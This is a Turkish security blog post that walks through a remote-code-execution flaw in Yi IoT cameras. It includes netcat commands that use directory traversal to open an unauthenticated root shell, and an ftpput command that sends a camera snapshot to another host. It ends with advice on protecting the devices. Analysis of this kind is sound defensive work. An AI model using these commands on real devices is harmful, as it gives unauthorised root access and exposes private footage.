<!DOCTYPE html>
<html lang="tr"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Analizi | Alperen Keskin</title>
<meta property="og:title" content="Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Analizi | Alperen Keskin" />
<meta name="twitter:title" content="Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Analizi | Alperen Keskin" />
<meta itemprop="name" content="Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Analizi | Alperen Keskin" />
<meta name="application-name" content="Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Analizi | Alperen Keskin" />
<meta property="og:site_name" content="Alperen Keskin Blog" />

<meta name="description" content="Siber Güvenlik ve yazılım blogu">
<meta itemprop="description" content="Siber Güvenlik ve yazılım blogu" />
<meta property="og:description" content="Siber Güvenlik ve yazılım blogu" />
<meta name="twitter:description" content="Siber Güvenlik ve yazılım blogu" />

<meta property="og:locale" content="tr" />
<meta name="language" content="tr" />

  <link rel="alternate" hreflang="tr" href="https://alperenkesk.github.io/posts/iot-hacking/yi-iot-rce-zafiyet-analizi/" title="Türkçe" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2025-06-23T21:00:00&#43;0300 />
    <meta property="article:published_time" content=2025-06-23T21:00:00&#43;0300 />
    <meta property="og:url" content="https://alperenkesk.github.io/posts/iot-hacking/yi-iot-rce-zafiyet-analizi/" />

    
    <meta property="og:article:author" content="Alperen Keskin" />
    <meta property="article:author" content="Alperen Keskin" />
    <meta name="author" content="Alperen Keskin" />
    
    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Analizi",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2025-06-23",
        "description": "",
        "wordCount":  493 ,
        "mainEntityOfPage": "True",
        "dateModified": "2025-06-23",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "Alperen Keskin"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.147.8">

    
    <meta property="og:url" content="https://alperenkesk.github.io/posts/iot-hacking/yi-iot-rce-zafiyet-analizi/">
  <meta property="og:site_name" content="Alperen Keskin">
  <meta property="og:title" content="Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Analizi">
  <meta property="og:description" content="Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Akıllı ev sistemlerinde kullanılan güvenlik kameraları, evimizi daha güvenli hale getirmek için tasarlansa da bazen bu cihazlar kendileri ciddi bir güvenlik riski haline gelebiliyor. Bu yazıda, Yi IoT marka IP kameralarında tespit edilen ve GitHub’da Yasha-ops tarafından yayımlanan bir uzaktan kod çalıştırma (RCE) zafiyetini inceleyeceğiz.
🚨 Zafiyetin Özeti Yi IoT kameraları üzerinde çalışan iki servis, saldırganlara cihaz üzerinde tam yetkiyle işlem yapma imkânı tanımaktadır:">
  <meta property="og:locale" content="tr">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:published_time" content="2025-06-23T21:00:00+03:00">
    <meta property="article:modified_time" content="2025-06-23T21:00:00+03:00">
    <meta property="article:tag" content="Siber-Güvenlik">
    <meta property="article:tag" content="Iot">
    <meta property="article:tag" content="Rce">
    <meta property="article:tag" content="Kamera Güvenliği">
    <meta property="article:tag" content="Zafiyet Analizi">


    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Analizi">
  <meta name="twitter:description" content="Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Akıllı ev sistemlerinde kullanılan güvenlik kameraları, evimizi daha güvenli hale getirmek için tasarlansa da bazen bu cihazlar kendileri ciddi bir güvenlik riski haline gelebiliyor. Bu yazıda, Yi IoT marka IP kameralarında tespit edilen ve GitHub’da Yasha-ops tarafından yayımlanan bir uzaktan kod çalıştırma (RCE) zafiyetini inceleyeceğiz.
🚨 Zafiyetin Özeti Yi IoT kameraları üzerinde çalışan iki servis, saldırganlara cihaz üzerinde tam yetkiyle işlem yapma imkânı tanımaktadır:">


    

    <link rel="canonical" href="https://alperenkesk.github.io/posts/iot-hacking/yi-iot-rce-zafiyet-analizi/">
    <link href="/style.min.2d921c18cf1ec555ffc03d59a8adc211c402c68c930c27d6a0c306ab175a8d09.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="https://alperenkesk.github.io/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
      <script async src="https://www.googletagmanager.com/gtag/js?id=G-2JM75S6REN"></script>
      <script>
        var doNotTrack = false;
        if ( false ) {
          var dnt = (navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack);
          var doNotTrack = (dnt == "1" || dnt == "yes");
        }
        if (!doNotTrack) {
          window.dataLayer = window.dataLayer || [];
          function gtag(){dataLayer.push(arguments);}
          gtag('js', new Date());
          gtag('config', 'G-2JM75S6REN');
        }
      </script>
    
</head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://alperenkesk.github.io/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title></title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Anasayfa
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        Yazılar
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/pages/about/">
                        Hakkımda
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti Analizi</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2025-06-23T21:00:00&#43;03:00" itemprop="datePublished"> 23 Haz 2025 </time>
                </div>
                
            </header>
            
    
    <details class="toc" ZgotmplZ>
        <summary><b></b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#yi-iot-güvenlik-kameralarında-uzaktan-kod-çalıştırma-rce-zafiyeti">Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti</a></li>
    <li><a href="#-zafiyetin-özeti">🚨 Zafiyetin Özeti</a></li>
    <li><a href="#-teknik-analiz">🧪 Teknik Analiz</a>
      <ul>
        <li><a href="#-1-daemon-servisi-port-6789">🔌 1. Daemon Servisi (Port 6789)</a></li>
        <li><a href="#-2-cmd-servisi-port-999">⚙️ 2. CMD Servisi (Port 999)</a></li>
      </ul>
    </li>
    <li><a href="#-saldırı-senaryosu-yerel-ağ-üzerinden">🧰 Saldırı Senaryosu (Yerel Ağ Üzerinden)</a>
      <ul>
        <li><a href="#-iot-cihazının-tespiti">🔍 IoT Cihazının Tespiti</a></li>
        <li><a href="#gerekli-araçlar">Gerekli Araçlar</a></li>
        <li><a href="#-adım-1-komut-dinleyici-açtırmak">🧱 Adım 1: Komut Dinleyici Açtırmak</a></li>
        <li><a href="#-adım-2-cmd-servisine-bağlanmak">🧱 Adım 2: CMD Servisine Bağlanmak</a></li>
      </ul>
    </li>
    <li><a href="#-kamera-dosyalarına-erişim-ve-veri-sızdırma">📤 Kamera Dosyalarına Erişim ve Veri Sızdırma</a></li>
    <li><a href="#-etki-ve-güvenlik-riskleri">🎯 Etki ve Güvenlik Riskleri</a></li>
    <li><a href="#-korunma-yöntemleri">🔐 Korunma Yöntemleri</a></li>
    <li><a href="#-sonuç">🧩 Sonuç</a></li>
    <li><a href="#-kaynaklar">🔗 Kaynaklar</a></li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <h2 id="yi-iot-güvenlik-kameralarında-uzaktan-kod-çalıştırma-rce-zafiyeti">Yi IoT Güvenlik Kameralarında Uzaktan Kod Çalıştırma (RCE) Zafiyeti</h2>
<p>Akıllı ev sistemlerinde kullanılan güvenlik kameraları, evimizi daha güvenli hale getirmek için tasarlansa da bazen bu cihazlar kendileri ciddi bir güvenlik riski haline gelebiliyor. Bu yazıda, Yi IoT marka IP kameralarında tespit edilen ve GitHub’da <a href="https://github.com/Yasha-ops/RCE-YiIOT">Yasha-ops</a> tarafından yayımlanan bir <strong>uzaktan kod çalıştırma (RCE)</strong> zafiyetini inceleyeceğiz.</p>
<hr>
<h2 id="-zafiyetin-özeti">🚨 Zafiyetin Özeti</h2>
<p>Yi IoT kameraları üzerinde çalışan iki servis, saldırganlara cihaz üzerinde tam yetkiyle işlem yapma imkânı tanımaktadır:</p>
<ul>
<li><strong>Port 6789</strong>: Dosya çalıştırmaya açık olan “daemon” servisi</li>
<li><strong>Port 999</strong>: Doğrudan root yetkisiyle çalışan “cmd” servisi</li>
</ul>
<p>Bu iki servis bir arada kullanılarak cihazda kalıcı root erişimi sağlanabilir.</p>
<hr>
<h2 id="-teknik-analiz">🧪 Teknik Analiz</h2>
<h3 id="-1-daemon-servisi-port-6789">🔌 1. Daemon Servisi (Port 6789)</h3>
<ul>
<li>Kamera, port 6789 üzerinden gelen verileri doğrudan işler.</li>
<li>Herhangi bir doğrulama yapılmadan gelen dizin bilgileri yürütülür.</li>
<li><code>../../../usr/bin/cmd</code> gibi bir <strong>directory traversal</strong> girdisi ile <code>/usr/bin/cmd</code> çalıştırılabilir.</li>
</ul>
<h3 id="-2-cmd-servisi-port-999">⚙️ 2. CMD Servisi (Port 999)</h3>
<ul>
<li><code>/usr/bin/cmd</code> çalıştırıldığında kamera, 999 numaralı port üzerinden gelen TCP bağlantılarını dinlemeye başlar.</li>
<li>Bu servis, <strong>şifresiz ve kimlik doğrulamasız</strong> olarak çalışır.</li>
<li>Bağlantı kuran herkes, cihazda <strong>root yetkileriyle komut çalıştırabilir</strong>.</li>
</ul>
<hr>
<h2 id="-saldırı-senaryosu-yerel-ağ-üzerinden">🧰 Saldırı Senaryosu (Yerel Ağ Üzerinden)</h2>
<h3 id="-iot-cihazının-tespiti">🔍 IoT Cihazının Tespiti</h3>
<p>Cihazı bulmak için öncelikle IoT kameranın yerel ağdaki IP adresi <code>nmap</code> ile tespit edilmelidir. Örneğin:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap -p 6789,999 --open 192.168.1.0/24
</span></span></code></pre></div><p>Bu tarama sonucunda belirtilen portlar açık olan cihazlar listelenecek ve kameranın IP’si bulunabilecektir.</p>
<h3 id="gerekli-araçlar">Gerekli Araçlar</h3>
<ul>
<li><code>nmap</code> (port taraması için)</li>
<li><code>nc</code> (netcat, bağlantı sağlamak için)</li>
<li>Kamerayla aynı ağda olmak (örneğin Wi-Fi bağlantısı)</li>
</ul>
<h3 id="-adım-1-komut-dinleyici-açtırmak">🧱 Adım 1: Komut Dinleyici Açtırmak</h3>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">echo</span> -ne <span class="s2">&#34;../../../usr/bin/cmd&#34;</span> <span class="p">|</span> nc 192.168.1.20 <span class="m">6789</span>
</span></span></code></pre></div><h3 id="-adım-2-cmd-servisine-bağlanmak">🧱 Adım 2: CMD Servisine Bağlanmak</h3>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nc 192.168.1.20 <span class="m">999</span>
</span></span></code></pre></div><p>Bağlantı kurulduktan sonra artık root erişiminiz vardır:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">id
</span></span><span class="line"><span class="cl">whoami
</span></span><span class="line"><span class="cl">ls /
</span></span></code></pre></div><hr>
<h2 id="-kamera-dosyalarına-erişim-ve-veri-sızdırma">📤 Kamera Dosyalarına Erişim ve Veri Sızdırma</h2>
<p>Kamera üzerinde çalışan <code>cmd</code> servisi aracılığıyla sistemdeki tüm dosyalara erişebilirsiniz. Özellikle dikkat çeken dosya ve dizinler:</p>
<ul>
<li><code>/tmp/motion.jpg</code> — Hareket algılandığında çekilen son kare</li>
<li><code>/home/base/</code> — Kamera konfigürasyonları</li>
<li><code>/system/init/start.sh</code> — Açılışta çalışan betikler</li>
</ul>
<p>Cihazda gömülü <code>ftpput</code> komutu, bu dosyaları yerel ağdaki başka bir FTP sunucusuna göndermek için kullanılabilir:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ftpput -u anonymous -p anonymous 192.168.1.5 sızdırılan.jpg /tmp/motion.jpg
</span></span></code></pre></div><blockquote>
<p>⚠️ Not: FTP kullanımı zorunlu değildir. Ancak veri dışa aktarmak isteyen bir saldırgan için faydalı bir yöntemdir.</p></blockquote>
<hr>
<h2 id="-etki-ve-güvenlik-riskleri">🎯 Etki ve Güvenlik Riskleri</h2>
<table>
  <thead>
      <tr>
          <th>Risk Türü</th>
          <th>Açıklama</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Root erişimi</td>
          <td>Tam denetim, yapılandırma ve sistem dosyalarına erişim</td>
      </tr>
      <tr>
          <td>Görüntü/log hırsızlığı</td>
          <td>Kamera verileri dışa sızdırılabilir</td>
      </tr>
      <tr>
          <td>Kalıcı zararlı kurulum</td>
          <td>Cihaza arka kapı veya zararlı yazılım yerleştirilebilir</td>
      </tr>
      <tr>
          <td>Ağ içi yayılma riski</td>
          <td>Diğer IoT cihazları veya bilgisayarlara zıplama yapılabilir</td>
      </tr>
  </tbody>
</table>
<hr>
<h2 id="-korunma-yöntemleri">🔐 Korunma Yöntemleri</h2>
<ul>
<li>Kamera firmware’ini <strong>üretici sitesinden güncel tutun</strong>.</li>
<li>Modem veya güvenlik duvarınızdan <strong>6789 ve 999 portlarını kapatın</strong>.</li>
<li>Kameraları izole bir VLAN veya ayrı ağda konumlandırın.</li>
<li><strong>Varsayılan şifreleri değiştirin</strong>, her cihaz için benzersiz kimlik bilgileri kullanın.</li>
<li>Gelişmiş kullanıcılar için: IDS/IPS sistemleri ile TCP trafiğini analiz edin.</li>
</ul>
<hr>
<h2 id="-sonuç">🧩 Sonuç</h2>
<p>Yi IoT güvenlik kameralarında keşfedilen bu zafiyet, IoT cihazlarının gerekli güvenlik önlemleri alınmadığında ciddi riskler barındırabileceğini göstermektedir. Ev veya ofis ağında bulunan bu tür cihazlar, çoğu zaman gözden kaçırılmakta ve saldırganlar için kolay bir hedef haline gelmektedir. Bu nedenle, IoT cihazlarının düzenli olarak denetlenmesi ve güvenlik önlemlerinin güncel tutulması büyük önem taşır.</p>
<hr>
<h2 id="-kaynaklar">🔗 Kaynaklar</h2>
<ul>
<li>GitHub: <a href="https://github.com/Yasha-ops/RCE-YiIOT">https://github.com/Yasha-ops/RCE-YiIOT</a></li>
<li>CVE Referansları: CVE-2025-29659, CVE-2025-29660</li>
</ul>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="/index.xml" target="_blank" rel="noopener noreferrer me"
    title="Rss">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M4 11a9 9 0 0 1 9 9" />
    <path d="M4 4a16 16 0 0 1 16 16" />
    <circle cx="5" cy="19" r="1" />
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2025 Alperen Keskin.
        
    </small>
</footer><a href="#" title="" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    




    
    
        
    

    
    
        
    



    
    <script src="https://alperenkesk.github.io/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js" integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30&#43;lSNuSkl4QXuNyy8="></script>

    

</body>
</html>
